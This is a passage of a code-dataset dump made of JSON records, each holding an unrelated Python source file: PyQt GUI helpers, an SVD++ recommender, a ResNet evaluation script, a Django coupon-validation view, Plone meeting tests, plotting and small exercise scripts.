Valid values for position: \"left\", \"right\", \"top\", \"bottom\"\n\n Args:\n toolbar: toolbar to use\n position: position of the toolbar\n\n Raises:\n ValueError: position does not exist\n \"\"\"\n if position not in TOOLBAR_AREAS:\n raise ValueError(\"Position not existing\")\n self.addToolBar(TOOLBAR_AREAS[position], toolbar)\n\n def add_toolbar_break(self, position: str = \"top\"):\n \"\"\"Adds a toolbar break to the given area\n after all the other objects that are present.\n\n Valid values for position: \"left\", \"right\", \"top\", \"bottom\"\n\n Args:\n position: position of the toolbar\n\n Raises:\n ValueError: position does not exist\n \"\"\"\n if position not in TOOLBAR_AREAS:\n raise ValueError(\"Position not existing\")\n self.addToolBarBreak(TOOLBAR_AREAS[position])\n\n def load_window_state(self):\n settings = core.Settings()\n geom = settings.value(\"mainwindow.geometry\", None)\n state = settings.value(\"mainwindow.state\", None)\n if geom is not None and state is not None:\n try:\n self.restoreGeometry(geom)\n self.restoreState(state)\n except TypeError:\n logging.info(\"Wrong type for window state. Probably Qt binding switch?\")\n pass\n\n def closeEvent(self, event):\n \"\"\"\n override, gets executed when app gets closed.\n saves GUI settings\n \"\"\"\n settings = core.Settings()\n settings.set_value(\"mainwindow.geometry\", self.saveGeometry())\n settings.set_value(\"mainwindow.state\", self.saveState())\n super().closeEvent(event)\n event.accept()\n\n def set_icon(self, icon: Union[QtGui.QIcon, str, None]):\n \"\"\"set the icon for the menu\n\n Args:\n icon: icon to use\n \"\"\"\n if not icon:\n icon = gui.Icon()\n elif isinstance(icon, str):\n icon = qta.icon(icon, color=\"lightgray\")\n self.setWindowIcon(icon)\n\n def add_widget_as_dock(self,\n name: str,\n title: str,\n vertical: bool = True,\n position: str = \"left\") -> widgets.DockWidget:\n dock_widget = widgets.DockWidget(self, name=name, title=title)\n widget = widgets.Widget()\n widget.id = f\"{name}.widget\"\n orientation = \"vertical\" if vertical else \"horizontal\"\n layout = widgets.BoxLayout(orientation, widget, margin=0)\n dock_widget.setWidget(widget)\n self.add_dockwidget(dock_widget, position)\n dock_widget.box = layout\n return dock_widget\n\n def add_dockwidget(self, dockwidget, position: str = \"left\"):\n position = DOCK_POSITIONS[position]\n self.addDockWidget(QtCore.Qt.DockWidgetArea(position), dockwidget)\n\n def remove_dockwidgets(self, dockwidgets: list):\n for i in dockwidgets:\n self.removeDockWidget(i)\n\n def get_docks(self) -> list:\n return self.find_children(QtWidgets.QDockWidget, recursive=False)\n\n def get_toolbars(self) -> list:\n return self.find_children(QtWidgets.QToolBar, recursive=False)\n\n def toggle_fullscreen(self):\n \"\"\"toggle between fullscreen and regular size\n \"\"\"\n if self.isFullScreen():\n self.showNormal()\n else:\n self.showFullScreen()\n\n\nif __name__ == \"__main__\":\n app = widgets.app()\n form = MainWindow()\n form.show()\n app.exec_()\n","sub_path":"prettyqt/widgets/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"556968139","text":"import pandas as pd\n\naudio = pd.read_csv(\"./data/dataset_with_clusters.csv\", header=0)\nlyrics = pd.read_csv(\"./data/dataset_with_clusters_lyrics.csv\", header=0)\n\ndataset = audio.set_index('remote_id').join(lyrics.set_index('ID'), lsuffix='_audio', rsuffix='_lyrics')\n\nprint(dataset.head())\n\nmatching_clusters = dataset[dataset['cluster_audio'] == dataset['cluster_lyrics']]\n\n\ndef get_dataframe_size(dataframe: pd.DataFrame):\n rows, _ = dataframe.shape\n\n return rows\n\n\nmatching_ratio = get_dataframe_size(matching_clusters) / get_dataframe_size(dataset)\n\nprint(matching_ratio)\n\n\nprint(matching_clusters[['cluster_audio', 'cluster_lyrics']])","sub_path":"analysis/analyze_results.py","file_name":"analyze_results.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"433184443","text":"import math\nimport pickle\nimport time\nimport numpy as np\n\n#calculate the overall average\ndef average(filename):\n fi = open(filename,'r')\n result = 0.0\n cnt = 0\n for line in fi:\n cnt += 1\n arr = line.split()\n result += int(arr[2].strip())\n return result/cnt\n\ndef InterProduct(v1,v2):\n result = 0\n for i in range(len(v1)):\n result += v1[i] * v2[i]\n return result\n\ndef PredictScore(av,bu,bi,pu,qi):\n pScore = av + bu + bi + InterProduct(pu,qi)\n if pScore < 1:\n pScore = 1\n elif pScore > 5:\n pScore = 5\n return pScore\n\n#def SVD(configureFile, testDataFile, trainDataFile, modelSaveFile):\ndef SVD(configureFile,trainDataFile,modelSaveFile):\n #get the configure\n fi = open(configureFile,'r')\n line = fi.readline()\n arr = line.split()\n averageScore = float(arr[0].strip())\n userNum = int(arr[1].strip())\n itemNum = int(arr[2].strip())\n factorNum = int(arr[3].strip())\n learnRate = float(arr[4].strip())\n regularization = float(arr[5].strip())\n fi.close()\n\n bi = [0.0 for i in range(itemNum)] #bi表示用户评分偏离平均分程度\n bu = [0.0 for i in range(userNum)] #bu表示商户评分偏离平均分程度\n sum_ys = [0.0 for i in range(factorNum)]\n temp = math.sqrt(factorNum)\n w = math.sqrt(itemNum)\n qi = np.array([[(0.1 * np.random.random() / temp) for j in range(factorNum)] for i in range(itemNum)]) #构造商店/因子矩阵\n pu = np.array([[(0.1 * np.random.random() / temp) for j in range(factorNum)] for i in range(userNum)]) #构造用户/因子矩阵\n print('initinalization end\\nstart training\\n')\n Y = np.random.normal(0,1,size=(itemNum,factorNum)) # 构造商店/因子矩阵\n #train model\n preRmse = 100000000.0\n\n for step in range(50):\n fi = open(trainDataFile,'r')\n for line in fi:\n arr = line.split()\n uid = int(arr[0].strip()) - 1\n iid = int(arr[1].strip()) - 1\n # uid = int(arr[0].strip())\n # iid = int(arr[1].strip())\n score = float(arr[2].strip())\n prediction = PredictScore(averageScore,bu[uid],bi[iid],pu[uid],qi[iid]) #预估分数\n\n eui = score - prediction #实际分数和预测评分的差值\n\n #update parameters\n bu[uid] += learnRate * (eui - regularization * bu[uid])\n bi[iid] += learnRate * (eui - regularization * bi[iid])\n sum_f = np.sum(Y, axis=0)\n\n for k in range(factorNum):\n temp = pu[uid][k] #attention here,must save the value of pu before updating\n sum_ys[k] = sum_f[k] / w\n pu[uid][k] += learnRate * (eui * qi[iid][k] - regularization*temp)\n qi[iid][k] += learnRate * (eui * (temp + sum_ys[k]) -regularization * qi[iid][k])\n Y[iid][k] += learnRate * (eui * qi[iid][k]/w - regularization * Y[iid][k])\n\n fi.close()\n #learnRate *= 0.9\n curRmse = Validate(trainDataFile, averageScore, bu, bi, pu, qi)\n print(\"test_RMSE in step %d: %f\" %(step, curRmse))\n if curRmse >= preRmse:\n break\n else:\n preRmse = curRmse\n #write the model to files\n fo = open(modelSaveFile,'wb')\n pickle.dump(bu,fo,True)\n pickle.dump(bi, fo, True)\n pickle.dump(qi, fo, True)\n pickle.dump(pu, fo, True)\n fo.close()\n print('model generation over')\n\n#validate the model\ndef Validate(testDataFile,av,bu,bi,pu,qi):\n cnt = 0\n rmse = 0.0\n fi = open(testDataFile,'r')\n for line in fi:\n cnt += 1\n arr = line.split()\n uid = int(arr[0].strip()) - 1\n iid = int(arr[1].strip()) - 1\n # uid = int(arr[0].strip())\n # iid = int(arr[1].strip())\n pScore = PredictScore(av,bu[uid],bi[iid],pu[uid],qi[iid])\n\n tScore = float(arr[2].strip())\n #print('tScore%f'%tScore,'pScore%f\\n'%pScore)\n rmse += (tScore - pScore) * (tScore - pScore)\n fi.close()\n return math.sqrt(rmse/cnt)\n\n#use the model to make predict\ndef predict(configureFile,modelSaveFile,testDataFile,resultSaveFile):\n #get parameter\n fi = open(configureFile,'r')\n line = fi.readline()\n arr = line.split()\n averageScore = float(arr[0].strip())\n fi.close()\n\n #get model\n fi = open(modelSaveFile,'rb')\n bu = pickle.load(fi)\n bi = pickle.load(fi)\n qi = pickle.load(fi)\n pu = pickle.load(fi)\n fi.close()\n\n #predict\n fi = open(testDataFile,'r')\n fo = open(resultSaveFile,'w')\n for line in fi:\n arr = line.split()\n uid = int(arr[0].strip()) - 1\n iid = int(arr[1].strip()) - 1\n # uid = int(arr[0].strip())\n # iid = int(arr[1].strip())\n pScore = PredictScore(averageScore,bu[uid],bi[iid],pu[uid],qi[iid])\n fo.write('{} {} {}'.format(arr[0],arr[1],pScore))\n fo.write('\\n')\n fi.close()\n fo.close()\n result = test_rmse(testDataFile,resultSaveFile)\n print('test_RMSE is %f'%result)\n print('predict over')\n\ndef test_rmse(testDataFile,resultSaveFile):\n fi = open(testDataFile,'r')\n fo = open(resultSaveFile,'r')\n test_score = []\n predict_score = []\n rmse = 0\n cnt = 0\n for i in fi:\n test_score.append(float(i.split()[2].strip()))\n fi.close()\n for i in fo:\n predict_score.append(float(i.split()[2].strip()))\n fo.close()\n score = zip(test_score,predict_score)\n for tScore,pScore in score:\n cnt += 1\n rmse += (tScore - pScore) * (tScore - pScore)\n return math.sqrt(rmse/cnt)\n\nif __name__ == '__main__':\n configureFile = 'svd.conf'\n\n testDataFile = '../map/smallPredictionMatrix.txt'\n trainDataFile = '../map/smallMatrix.txt'\n modelSaveFile = 'svd_model.pkl'\n resultSaveFile = '../map/prediction.txt'\n\n SVD(configureFile,trainDataFile,modelSaveFile)\n predict(configureFile,modelSaveFile,testDataFile,resultSaveFile)\n","sub_path":"model/stochastic_gradient_descent_SVD/SVD++.py","file_name":"SVD++.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"107111916","text":"favourite_places = {\n 'jan' : ['vietnam','laos','cambodia'],\n 'hermonie' : ['hongkong','macau','nepal'],\n 'rizwan' :['australia','luang prabung','malasia'],\n}\n\nfor key, value in favourite_places.items():\n print(f\"{key} loves the below places\")\n for place in value:\n print(place)\n print(\"\\n\")\n","sub_path":"c15.py","file_name":"c15.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"302010816","text":"\"\"\"Run test from the best model checkpoint\"\"\"\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\nfrom config import get_args\nfrom model import ResNet26, ResNet38, ResNet50\nfrom preprocess import load_data\n\n\ndef main(args, logger):\n train_loader, test_loader = load_data(args)\n if args.dataset == 'CIFAR10':\n num_classes = 10\n elif args.dataset == 'CIFAR100':\n num_classes = 100\n elif args.dataset == 'IMAGENET':\n num_classes = 1000\n\n print('img_size: {}, num_classes: {}, stem: {}'.format(args.img_size, num_classes, args.stem))\n if args.model_name == 'ResNet26':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet26(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n elif args.model_name == 'ResNet38':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet38(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n elif args.model_name == 'ResNet50':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet50(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n\n if args.pretrained_model:\n filename = 'best_model_' + str(args.dataset) + '_' + str(args.model_name) + '_' + str(args.stem) + '_ckpt.tar'\n print('filename :: ', filename)\n file_path = os.path.join(args.checkpoint_dir, filename)\n checkpoint = torch.load(file_path)\n\n model.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch']\n best_acc = checkpoint['best_acc']\n model_parameters = checkpoint['parameters']\n print('Load model, Parameters: {0}, Start_epoch: {1}, Acc: {2}'.format(model_parameters, start_epoch, best_acc))\n logger.info('Load model, Parameters: {0}, Start_epoch: {1}, Acc: {2}'.format(model_parameters, start_epoch, best_acc))\n else:\n start_epoch = 1\n best_acc = 0.0\n\n if args.cuda:\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n model = model.cuda()\n\n eval(model, test_loader, args)\n\n\ndef eval(model, test_loader, args):\n print('evaluation ...')\n model.eval()\n correct = 0\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n output = model(data)\n prediction = output.data.max(1)[1]\n correct += prediction.eq(target.data).sum()\n\n acc = 100. * float(correct) / len(test_loader.dataset)\n print('Test acc: {0:.2f}'.format(acc))\n return acc\n\n\nif __name__ == '__main__':\n args, logger = get_args()\n main(args, logger)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"389650606","text":"#!/usr/bin/env python\nimport sys\nfrom search import Search\n\n\nif __name__ == '__main__':\n try:\n i = Search()\n\n # Make a copy of the list\n # and pop the python file name\n args = sys.argv\n args.pop(0)\n\n # Search\n r = i.query(args)\n\n print('Result from search') \n print(r['AbstractURL'])\n\n except Exception as e:\n print('error', e)\n","sub_path":"ddg/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"224462896","text":"class Mobile:\n fp=\"yes\" # class variable / static variable\n\n def __init__(self):\n self.model=\"RealMe X\" # instance variable\n def show_model(self): # instance Method\n print(\"Model: \",self.model) # Accessing instance variable\n\n @classmethod # class method\n def car(cls):\n print(\"Finger Print: \", cls.fp) # Accessing class variable\n\n\nrealme=Mobile() # object creation\nrealme.show_model() # Accessing instance method outside the class\nMobile.car() # Accessing class method outside the class\nprint()\nMobile.fp=\"No\" # Change the value of class variable/static variable using class\nMobile.car() # Accessing class method outside the class\n","sub_path":"Python_P_P/Class_Variable_or static_Variable_classmethod.py","file_name":"Class_Variable_or static_Variable_classmethod.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"454848051","text":"import sys\r\ntolerance = []\r\ntolerance.append(int(sys.argv[1])) #local\r\ntolerance.append(int(sys.argv[2])) #zero\r\ntolerance.append(int(sys.argv[3])) #width\r\n#tolerance = [4, 4, 7]\r\nzeroMaxTXT = open('C:/50_reprap_python_beanshell/maxZero.txt', 'r')\r\nzeroMinTXT = open('C:/50_reprap_python_beanshell/minZero.txt', 'r')\r\nminXTXT = open('C:/50_reprap_python_beanshell/minCoor.txt', 'r')\r\nmaxXTXT = open('C:/50_reprap_python_beanshell/maxCoor.txt', 'r')\r\nminCoorLABTXT = open('C:/50_reprap_python_beanshell\\minCoorLAB.txt', 'r')\r\nmaxCoorLABTXT = open('C:/50_reprap_python_beanshell\\maxCoorLAB.txt', 'r')\r\nerrorListTXT = open('C:/50_reprap_python_beanshell\\errorList.txt', 'w')\r\n\r\nminCoorLAB = []\r\nmaxCoorLAB = []\r\ncoorZ_LAB = []\r\nmaxX = []\r\nminX = []\r\nmaxZ = []\r\nerror = []\r\nzeroMax = []\r\nzeroMin = []\r\n\r\n\r\nfor line in maxCoorLABTXT:\r\n maxCoorLAB.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n coorZ_LAB.append(float(line[line.find('\\t', None, None)+1:].replace(',', '.')))\r\n\r\nfor line in minCoorLABTXT:\r\n minCoorLAB.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\nfor line in maxXTXT:\r\n maxX.append(float(line[:line.find('\\t', None, None)]))\r\n maxZ.append(float(line[line.find('\\t', None, None)+1:]))\r\n\r\nfor line in minXTXT:\r\n minX.append(float(line[:line.find('\\t', None, None)]))\r\n\r\nfor line in zeroMaxTXT:\r\n zeroMax.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\nfor line in zeroMinTXT:\r\n zeroMin.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\n\r\ntransformZ = coorZ_LAB[0]\r\nbegin = maxZ[0]\r\nlay = maxZ[1] - maxZ[0]\r\npxMm = (maxX[0] - minX[0])/(zeroMax[0] - zeroMin[0])\r\n\r\n\r\nerrorListTXT.write('pxMm : ' + str(pxMm) + '\\n')\r\n\r\nfor i in range(len(maxCoorLAB) - 1):\r\n check = False\r\n highRake = ((transformZ - coorZ_LAB[i])*pxMm + begin)\r\n startCount = (highRake - begin)//lay\r\n t1 = abs((maxCoorLAB[i] - maxCoorLAB[i+1]) * pxMm)\r\n t2 = abs((maxCoorLAB[i] - zeroMax[-1]) * pxMm)\r\n widthReal = (maxCoorLAB[i] - minCoorLAB[i]) * pxMm\r\n '''\r\n print('coorZ_LAB[i] : ', coorZ_LAB[i])\r\n print('hR : ', highRake)\r\n print('strat : ', startCount)\r\n print('i : ', i)\r\n print('t1 : ', t1)\r\n print('t2 : ', t2)\r\n '''\r\n errorListTXT.write(str(coorZ_LAB[i]) + '____________________________\\n')\r\n\r\n for j in range(int(startCount) - 2, int(startCount) + 3):\r\n if (j+1 < len(maxX)) and (j >= 0):\r\n t3 = abs(maxX[j] - maxX[j+1])\r\n t4 = abs(maxX[j] - maxX[0])\r\n widthNom = maxX[j] - minX[j]\r\n\r\n '''\r\n print('t3 : ', t3)\r\n print('t4 : ', t4)\r\n print('widthReal : ', widthReal)\r\n print('widthNom : ', widthNom)\r\n '''\r\n\r\n if (abs(t1 - t3)/(widthReal / 100) < tolerance[0]) and (abs(t2 - t4)/(widthReal / 100) < tolerance[1]) and (abs(widthReal - widthNom)/(widthReal / 100) < tolerance[2]):\r\n check = True\r\n\r\n errorListTXT.write('width : ' + str(abs(widthReal - widthNom)/(widthReal / 100)) + '\\n')\r\n errorListTXT.write('local : ' + str(abs(t1 - t3)/(widthReal / 100)) + '\\n')\r\n errorListTXT.write('byZero : ' + str(abs(t2 - t4)/(widthReal / 100)) + '\\n')\r\n\r\n if check is False:\r\n error.append(str(coorZ_LAB[i]))\r\n\r\n #print(' :___________________________________________________', check)\r\n\r\nfor i in error:\r\n print(i)\r\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"385644300","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.http import JsonResponse\nfrom coupons import settings as coupon_settings\nfrom . import models\n\n\ndef get_coupon_details(request):\n code = request.GET.get('code', None)\n types = request.GET.get('types', None)\n products = request.GET.get('products', [])\n if code is None:\n data = {'err': _(\"Please provide a coupon code.\")}\n return JsonResponse(data)\n try:\n coupon = models.Coupon.objects.get_coupon(code)\n except models.Coupon.DoesNotExist:\n data = {'err': _(\"This code is not valid.\")}\n return JsonResponse(data)\n\n if not coupon.active:\n data = {'err': _(\"This coupon is not active\")}\n return JsonResponse(data)\n\n if request.user.is_anonymous and coupon.user_limit > 1:\n data = {'err': _(\"You must be logged in to use this coupon\")}\n return JsonResponse(data)\n\n if coupon.is_redeemed:\n data = {'err': _(\"This coupon has already been redeemed\")}\n return JsonResponse(data)\n\n if request.user.is_anonymous:\n user = None\n else:\n user = request.user\n try: # check if there is a user bound coupon existing\n user_coupon = coupon.users.get(user=user)\n if user_coupon.redeemed_at is not None:\n data = {'err': _(\"You have already redeemed this coupon once.\")}\n return JsonResponse(data)\n except models.CouponUser.DoesNotExist:\n if coupon.user_limit is not 0: # zero means no limit of user count\n if not coupon.bulk:\n # only user bound coupons left and you don't have one\n if coupon.user_limit is coupon.users.filter(user__isnull=False).count():\n data = {'err': _(\"This code is not valid for your account.\")}\n return JsonResponse(data)\n if coupon.user_limit is coupon.users.filter(redeemed_at__isnull=False).count(): # all coupons redeemed\n data = {'err': _(\"This code has already been used.\")}\n return JsonResponse(data)\n else:\n if coupon.users.filter(code=code).exists():\n data = {'err': _(\"This code has already been used\")}\n return JsonResponse(data)\n if coupon.bulk_number is coupon.users.filter(user__isnull=False).count():\n data = {'err': _(\"This code is not valid for your account.\")}\n return JsonResponse(data)\n if types is not None and coupon.type not in types:\n data = {'err': _(\"This code is not meant to be used here.\")}\n return JsonResponse(data)\n if coupon.expired():\n data = {'err': _(\"This code is expired.\")}\n return JsonResponse(data)\n applicable_products = []\n if coupon_settings.PRODUCT_MODEL is not None:\n if len(products) != 0 and coupon.valid_products.count() > 0:\n for valid_product in coupon.valid_products.all():\n product_name = getattr(valid_product, coupon_settings.PRODUCT_NAME_FIELD)\n if product_name in products:\n applicable_products.append(product_name)\n if len(applicable_products) == 0:\n data = {'err': _(\"This code is not valid for the product selected.\")}\n return JsonResponse(data)\n data = {\n 'code': coupon.code,\n 'value': coupon.value,\n 'type': coupon.type,\n 'gift_certificate': coupon.productlineitem_set.exists(),\n }\n if len(applicable_products):\n data['products'] = applicable_products\n return JsonResponse(data)\n","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"575903220","text":"from . import objectives\n\n\nclass TestWordlist:\n\n def test_wordlist(self):\n w = objectives.wordlist()\n assert len(w) == 338_882\n\n\nclass TestReadable:\n\n def test_tdd(self):\n words = objectives.wordlist()\n results = objectives.readable(words)\n assert len(results) > 100\n print(len(results))\n\n for r in results:\n assert r[0] == r[1] + r[2]\n\n assert ('albums', 'al', 'bums') in results\n assert ('weaver', 'we', 'aver') in results\n\n def test_profiling(self):\n words = objectives.wordlist()\n for _ in range(100):\n objectives.readable(words)\n\n\nclass TestFast:\n\n def test_tdd(self):\n words = objectives.wordlist()\n results = objectives.fast(words)\n assert len(results) > 100\n print(len(results))\n\n for r in results:\n assert r[0] == r[1] + r[2]\n\n assert ('albums', 'al', 'bums') in results\n assert ('weaver', 'we', 'aver') in results\n\n def test_profiling(self):\n words = objectives.wordlist()\n for _ in range(100):\n objectives.fast(words)\n\n\nclass TestExtensible:\n\n def test_tdd(self):\n for i in [4, 6, 8]:\n words = objectives.wordlist()\n results = objectives.extensible(words, i)\n assert len(results) > 100\n print(len(results))\n print(results[1000])\n print(results[5000])\n\n for r in results:\n assert len(r[0]) == i\n assert r[0] == r[1] + r[2]\n","sub_path":"kata20190320/test_objectives.py","file_name":"test_objectives.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"649093366","text":"# demo_weightedsum.py\n\nimport cv2\n\nimg1 = cv2.imread('dog.jpg', 1)\nimg2 = cv2.imread('cat.jpg', 1)\n\nprint(img1.shape)\nprint(img2.shape)\n\nimg2 = img2[0:img1.shape[0], 0:img1.shape[1], :]\nprint(img2.shape)\n\n# quit()\n\ncv2.imshow('Weighted image', img1)\n\nprint('Switch to image window. Then press any key to continue.')\n\ncv2.waitKey(0) # Wait for key press\n\nN = 10\nfor i in range(N):\n y = cv2.addWeighted(img1, 1-i/(N-1), img2, i/(N-1), 0) # '0' is an additive const.\n # y : weighted sum of two images\n cv2.imshow('Weighted image', y)\n cv2.waitKey(500) # Wait 0.5 seconds\n \ncv2.destroyAllWindows()\n","sub_path":"Module 8/demo 22 - video _cv2_/demo 22 - video (cv2)/D3 - arithmetic operations/demo_weightedsum.py","file_name":"demo_weightedsum.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"372463555","text":"from ftw.testbrowser import browsing\nfrom ftw.testbrowser.pages import statusmessages\nfrom opengever.testing import IntegrationTestCase\nfrom ftw.testbrowser.pages import factoriesmenu\n\n\nclass TestCommitteeContainer(IntegrationTestCase):\n\n features = ('meeting',)\n\n @browsing\n def test_can_configure_ad_hoc_template(self, browser):\n self.login(self.administrator, browser)\n self.committee_container.ad_hoc_template = None\n\n self.assertIsNone(self.committee_container.ad_hoc_template)\n self.assertIsNone(self.committee_container.get_ad_hoc_template())\n\n browser.open(self.committee_container, view='edit')\n browser.fill({'Ad hoc agenda item template': self.proposal_template}).save()\n statusmessages.assert_no_error_messages()\n\n statusmessages.assert_message('Changes saved')\n\n self.assertIsNotNone(self.committee_container.ad_hoc_template)\n self.assertEqual(self.proposal_template,\n self.committee_container.get_ad_hoc_template())\n\n @browsing\n def test_can_configure_paragraph_template(self, browser):\n self.login(self.administrator, browser)\n self.committee_container.paragraph_template = None\n\n self.assertIsNone(self.committee_container.paragraph_template)\n self.assertIsNone(self.committee_container.get_paragraph_template())\n\n browser.open(self.committee_container, view='edit')\n browser.fill({'Paragraph template': self.sablon_template}).save()\n statusmessages.assert_no_error_messages()\n\n statusmessages.assert_message('Changes saved')\n\n self.assertIsNotNone(self.committee_container.paragraph_template)\n self.assertEqual(self.sablon_template,\n self.committee_container.get_paragraph_template())\n\n @browsing\n def test_can_add_with_templates(self, browser):\n self.login(self.manager, browser)\n browser.open()\n factoriesmenu.add('Committee Container')\n browser.fill({'Title': u'Sitzungen',\n 'Protocol header template': self.sablon_template,\n 'Protocol suffix template': self.sablon_template,\n 'Agenda item header template for the protocol': self.sablon_template,\n 'Agenda item suffix template for the protocol': self.sablon_template,\n 'Excerpt header template': self.sablon_template,\n 'Excerpt suffix template': self.sablon_template,\n 'Paragraph template': self.sablon_template,\n 'Ad hoc agenda item template': self.proposal_template}).save()\n statusmessages.assert_no_error_messages()\n\n self.assertEqual(self.proposal_template,\n browser.context.get_ad_hoc_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_paragraph_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_excerpt_header_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_excerpt_suffix_template())\n\n @browsing\n def test_visible_fields_in_forms(self, browser):\n \"\"\"Some fields should only be displayed when the word feature is\n enabled.\n Therefore we test the appearance of all fields.\n \"\"\"\n fields = [u'Title',\n u'Protocol header template',\n u'Protocol suffix template',\n u'Agenda item header template for the protocol',\n u'Agenda item suffix template for the protocol',\n u'Excerpt header template',\n u'Excerpt suffix template',\n u'Agendaitem list template',\n u'Table of contents template',\n u'Ad hoc agenda item template',\n u'Paragraph template']\n self.login(self.manager, browser)\n\n browser.open()\n factoriesmenu.add('Committee Container')\n self.assertEquals(fields, browser.css('form#form > div.field > label').text)\n\n browser.open(self.committee_container, view='edit')\n self.assertEquals(fields, browser.css('form#form > div.field > label').text)\n","sub_path":"opengever/meeting/tests/test_committee_container_word.py","file_name":"test_committee_container_word.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"118676677","text":"# https://stackoverflow.com/questions/46440443/candlestick-plot-from-a-pandas-dataframe-retry\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import matplotlib.ticker as mticker\nfrom mpl_finance import candlestick_ohlc\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport pandas as pd\n\n\n#df = pd.read_csv(\"Data/output.csv\", usecols=['Date', 'Open', 'High', 'Low', 'Close'])\ndf = pd.read_csv(\"C:\\\\Users\\\\aroom\\\\Documents\\\\Data\\\\forex\\\\EURUSD_m_ta.csv\",\n index_col='Date', parse_dates=True, usecols=['Date','Open','High','Low','Close'])\n\n#Reset the index to remove Date column from index\ndf_ohlc = df.reset_index()\n\n\n#Naming columns\ndf_ohlc.columns = [\"Date\",\"Open\",\"High\",'Low',\"Close\"]\n\n#Converting dates column to float values\ndf_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)\n\n#Making plot\nfig = plt.figure()\nax1 = plt.subplot2grid((6,1), (0,0), rowspan=6, colspan=1)\n\n#Converts raw mdate numbers to dates\nax1.xaxis_date()\nplt.xlabel(\"Date\")\nprint(df_ohlc)\n\n#Making candlestick plot\ncandlestick_ohlc(ax1, df_ohlc.values, width=1, colorup='g', colordown='k', alpha=0.75)\nplt.ylabel(\"Price\")\nplt.legend()\n\nplt.show()","sub_path":"plot_from_csv.py","file_name":"plot_from_csv.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"452593248","text":"import torch\nfrom torch_kalman.covariance import Covariance\nimport unittest\n\n\nclass TestCovariance(unittest.TestCase):\n def test_from_log_cholesky(self):\n covs = Covariance.from_log_cholesky(log_diag=torch.arange(1., 3.1).expand(3, -1),\n off_diag=torch.arange(1., 3.1).expand(3, -1))\n\n gt = torch.tensor([[7.3891, 2.7183, 5.4366],\n [2.7183, 55.5982, 24.1672],\n [5.4366, 24.1672, 416.4288]])\n for cov in covs:\n diff = (gt - cov).abs()\n self.assertTrue((diff < .0001).all())\n","sub_path":"tests/test_covariance.py","file_name":"test_covariance.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"384262101","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2018年1月5日15:48:21\n\n@author: slp\n'''\n# 待检查的留言内容\ntoCheckUserLeavedMessageDict = {\n \"id\": None,\n \"createUser\": None,\n \"createDate\": None,\n \"updateUser\": None,\n \"updateDate\": None,\n \"sortField\": None,\n \"order\": None,\n \"tqmobile\": None,\n \"submitTime\": None,\n \"userName\": None,\n \"orgName\": None,\n \"orginternalCode\": None,\n \"content\": None,\n \"remark\": None\n }\n\n\n# 搜索留言的请求字典\nsearchUserLeavedMessageDict = {\n 'leaveMessageDO.userName':'', \n 'leaveMessageDO.orgName': '',\n '_search': 'false',\n 'nd': 1515138218786,\n 'rows': 2000,\n 'page': 1,\n 'sidx' : \"submitTime\",\n 'sord': 'desc'\n }\n","sub_path":"testAPI/Web_Test/Interface/QuanKeCaiJi/HouTaiGuanLi21200/SystemManager/UserLeavedMessage/UserLeavedMessagePara.py","file_name":"UserLeavedMessagePara.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 